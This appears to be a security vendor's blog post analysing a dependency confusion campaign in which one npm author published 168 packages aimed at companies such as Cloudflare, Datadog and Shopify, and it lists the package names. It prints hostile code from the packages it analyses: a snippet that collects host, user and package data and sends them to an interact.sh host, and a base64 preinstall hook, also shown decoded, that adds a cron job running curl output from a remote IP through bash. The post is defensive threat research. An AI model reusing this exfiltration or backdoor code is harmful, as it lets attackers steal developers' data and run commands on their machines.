• Home
  • Resources
  • Blog
  • Single Author Uploaded 168 Packages to npm as Part of a Massive Dependency Confusion Attack

Single Author Uploaded 168 Packages to npm as Part of a Massive Dependency Confusion Attack

Single Author Uploaded 168 Packages to npm As Part of a Massive Dependency Confusion Attack
Single Author Uploaded 168 Packages to npm As Part of a Massive Dependency Confusion Attack

Using Mend Supply Chain Defender, Mend’s research team reported and blocked dozens of packages from the same author. These packages targeted developers of many companies and frameworks like slack, Cloudflare, Datadog, Metamask, react, Shopify, OpenSea, Angular and more.

A dependency confusion attack takes advantage of a software developer’s tendency to pull malicious code from public repositories rather than internal ones. It is one of the most effective attack exploits, as it is very easy for a programmer to import a malicious package from an open source registry with an identical name to that which the programmer intended to use.

What Happened?

One npm user named ​​’amgadesam007’ uploaded 168 packages to npm, targeting various different companies and frameworks. The actor was active from June 15 until he was taken down today, June 20. In this time frame, many packages were uploaded with names like:
‘slack-notifications’
‘Atomic-angular’
‘Cloudflare-docs-engine’
‘Datadog-app’
‘Metamask-state-log-explorer’
‘Shopify-marketplaces-buyer-app’
‘opensea-creatures’

As the first comment under index.js suggests, this is a security researcher under the name mega7 in HackerOne.

Although this is a security researcher, it does not change the fact that those packages are malicious. They collect sensitive information and send the information out with interactsh or piepedeam. 

All packages have a similar code and intend to exfiltrate user information:

const trackingData = JSON.stringify({
    p: package,
    c: __dirname,
    hd: os.homedir(),
    hn: os.hostname(),
    un: os.userInfo().username,
    dns: dns.getServers(),
    r: packageJSON ? packageJSON.___resolved : undefined,
    v: packageJSON.version,
    pjson: packageJSON,
});

var postData = querystring.stringify({
    msg: trackingData,
});

var options = {
    hostname: "cam9ar8b19p23s0tg6mgxppawdjkggiun.interact.sh", 
//replace burpcollaborator.net with Interactsh or pipedream
    port: 443,
    path: "/",
    method: "POST",
    headers: {
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": postData.length,
    },
};

 

Reducing Enterprise Application Security Risks:

More Work Needs to Be Done

List of malicious packages categorized and sorted alphabetically

 

Crypto:

0x-fee-wrapper-contract
agoric-servers
alpaca-oas
blockchain-classic-wallet
blockchain-wallet-ios
chain-desktop-wallet
client-sdk-contract-tests
contract-metadata
crypto-com-chain-wallet
dapp-inter
dapp-inter-agservers
eth-faucet
ethers-js-snap
metadata-api-nodejs
metamask
metamask-docs
metamask-state-log-explorer
nft-tickets-workshop
nft-tutorial
opensea-creatures
opensea-erc1155
opensea-ships-log
wallet-options

Shopify:

polaris-for-figma
polaris-for-vscode
shopify-cli-extensions-test-utils
shopify-marketplaces-buyer-app

Cloudflare:

cloudflare-docs
cloudflare-docs-engine
do-worker
doom-workers
doom-workers-site
launchdarkly-cloudflare-worker-template
research.cloudflare.com
workers-airtable-form
workers-airtable-form-handler
workers.cloudflare.com
workerskv.gui

Intercom:

intercom-react-native-example
intercom-react-native.podspec
io.intercom.cordova.sample

Zendesk:

zcli-monorepo

Github:

action-create-release-pr
action-prebuildify
action-publish-gh-pages
action-require-additional-reviewer
assign-issue
assign-pr
Contributor-site
git-dependency-maker

Frontend:

atomic-angular
atomic-next
cli-e2e
cloudinary-sample-angular
custom-pages-react-boilerplate
example-api-routes
example-google-analytics
git-gatsby
react-datepicker-docs
react-jesting-library
react-ldclient-default-values
react-native-performance-monorepo
redux-data-model-documentation
Vuestic-admin
webpack-vue-config

Datadog:

dapp-inter-ui
datadog-agent-github-action
datadog-app
datadog-app-example-random-dog-dog-image-widget
datadog-app-example-sentiment
datadog-app-example-stream-admin
datadog-app-sentiment
datadog-app-stream-admin
datadog-app-template
datadog-datadog_agent
datadog-synthetics-github-action
Dd-opentracing-cpp
dd-sdk-reactnative-example

 

Others:

adelphi-api
apps-showcase
appsec-event-rules-tools
ashion-ingest
astrajs
atomic-angular
atomic-next
attention-editor
babel-preset-es201
bakaman
boilerplate-fig-autocomplete
cdcrep-docs
cli-e2e
cloudinary-sample-angular
collection-events-discord-webhook
com.natw.secret_store_example
contentsource-connector
cs-task-runner
custom-pages-react-boilerplate
discount-functions-sample-app
discourse-prepend-tags-in-topic-slug
dummy_app
epam-assets
epam-promo
example-api-routes
example-google-analytics
example-rust
example-typescript
eyeglass-embroider-app
files_pdfviewer
flipper-plugin-ribtree
generator-connection
git-gatsby
heft-component-rig
helix-contentsource-connector
helix-rum-collector
helix-run-query
helix-slack-notification
helix-status-service
helloreactnative
hydrogen-monorepo
iframe-execution-environment
integration-framework
launchdarkly-api-typescript-sample
manualtestapp
mapray-js-monorepo
matic-docs
megaman-007mega
megaman0072
megamanz07007
miew-ap
miew-cli
minicom-node
minis-samples
module-worker
new-npm-packages
nnabla-browser
nodejs-driver
npm-mega
pages-plugins
pagespeed-server
pcln-types
plasma-website
platform-client
prerelease-registry
procore-sample-ror
proof-generation-api
pulsar-sink-docs
react-datepicker-docs
react-jesting-library
react-ldclient-default-values
react-native-performance-monorepo
redux-data-model-documentation
remote-ui
reorgs-frontend
rnskia
ruby-style-guide
sample-mini
sdk_repl_app
sdk-release
share-service-client
slack-notification
slint-config-nodejs
snapcanvas-sdk
spaces-design
stargate-docs
template-snap-monorepo
th-simple-keyring
theme-whale-light
timebase-web-admin
twofactor_totp
typescript-snap
ui-extensions-dev-console-app
upgrade-challenge
upload-dsyms-github-action
v3-monorepo
vuestic-admin
web-scripts-monorepo
web-sdk-mono-repo
webpack-vue-config
Wwi-app
xp-ui

 


 

In addition to the above attack, Mend research team detected and reported the package ‘@xunlie/vue-context-menu’ (by another author) in version 1.0.3, that adds a remote shell connection to a crontab in base 64. Crontab is a tool for linux that allows the use of a job scheduler known as cron to execute tasks.

At the time of writing, this package is still live on npm.

 "preinstall": "node -e 
\"require('child_process').exec(Buffer.from('KCBjcm9udGFiIC1sOyBlY2hv
ICIqLzEgKiAqICogKiBjdXJsIC0tY29ubmVjdC10aW1lb3V0IDEwIGh0dHA6Ly80Ny45M
y4xMzMuNjQvbnBtLmpzb258YmFzaCAgPiAvZGV2L251bGwgMj4mMSIgKSB8IGNyb250YW
IK', 'base64').toString('ascii'))\""

Preinstall as part of package.json.

Decoded from base 64, we can understand the intention of the code:

( crontab -l; echo "*/1 * * * * curl --connect-timeout 10 
http://47.93.133.64/npm.json|bash  > /dev/null 2>&1" ) | crontab

It registers a new cron job that will try to establish a connection with a remote host and pipe the content to bash. Once that is successful a remote shell will be opened.

How to protect your organization from supply chain attacks

Supply chain attacks evolve and grow more frequent each day. Dependency confusion attack attempts are very common. The easiest way to protect this attack surface is to use an automated supply chain security solution such as Mend Supply Chain Defender that informs you when you import a malicious package from open source registries. 

Mend enterprise customers using JFrog Artifactory as a private repository manager can prevent malicious open source software from entering their code base using the Mend Supply Chain Defender Integration with JFrog Artifactory

Learn how Mend Supply Chain Defender blocks software supply chain attacks.

Meet The Author

Tamir Ben Ari

Tamir Ben Ari is a malware researcher at Mend, investigating malicious behaviors such as typosquatting attacks, malicious takeovers, ATO attacks, Makefile pollution, Bitcoin mining, environment and credential-stealing, and dependency confusion. Previously, he held the role of security researcher at Mend, which included detailed vulnerability research in open source libraries.

Subscribe to Our Blog